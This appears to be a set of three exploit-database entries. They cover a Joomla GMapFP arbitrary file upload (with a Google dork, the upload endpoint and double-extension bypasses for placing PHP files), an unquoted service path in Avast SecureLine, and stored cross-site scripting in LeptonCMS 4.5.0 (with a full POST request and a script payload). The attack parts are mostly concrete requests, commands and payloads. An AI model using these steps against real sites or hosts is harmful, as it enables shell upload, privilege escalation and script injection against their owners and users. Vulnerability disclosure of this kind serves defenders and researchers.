# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-25 # Exploit Author: ThelastVvV # Vendor Homepage:https://gmapfp.org/ # Version:* Version J3.30pro # Tested on: Ubuntu # PoC: http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image # you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg # Dir File Path: http://127.0.0.1/images/gmapfp/file.php or http://127.0.0.1//images/gmapfp/file.php.png # The Joomla Gmapfp Components 3.x is allowing # remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads

# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-03-24 # Vendor Homepage:https://www.avast.com/ # Software Link :https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx # Tested Version: 5.5.522.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 8.1 Single Language x32 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | f indstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """ Avast SecureLine SecureLine C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe Auto C:\>sc qc SecureLine [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SecureLine TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Avast SecureLine DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: LeptonCMS 4.5.0 - Persistent Cross-Site Scripting # Google Dork: "lepton cms" # Date: 2019-03-24 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://lepton-cms.org/english/home.php # Software Link: https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php # Version: 4.5.0 # Tested on: Windows # CVE : CVE-2020-12707 ### Vulnerability : Persistent Cross-Site Scripting # Description A stored cross-site-scripting security issue in the edit page feature Url : http://TARGET/lepton/backend/pages/modify.php Request Type: POST Vulnerable Parameter : "content" Payload : content=<script>alert('XSS')</script> #POC POST /lepton/modules/wysiwyg/save.php?leptoken=03d01fea73f9810402beez1585032684 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://TARGET Connection: close Referer: http://TARGET/lepton/backend/pages/modify.php?page_id=5&leptoken=f04ef2dc728873e9fa849z1585032680 Cookie: cookieconsent_status=dismiss; SESSc3618c3927e551a1d6443b365aef1bc3=_guGZcGkV8IUWJx91f8pVQo8aBpxO4ipp75Un8WQN-g; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=420.420.420%257C%252F%257C.thiennv.com; nv4_ctr=MTI3XzBfMF8xLlpa; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7; lep8407sessionid=6aqrn6ccetoeqdes68e44hdlul Upgrade-Insecure-Requests: 1 page_id=5&section_id=5&content5=<script>alert('XSS')</script> ### History ============= 2020-03-18 Issue discovered 2020-04-20 Vendor contacted 2020-04-21 Vendor response and hotfix 2020-04-23 Vendor releases fixed versions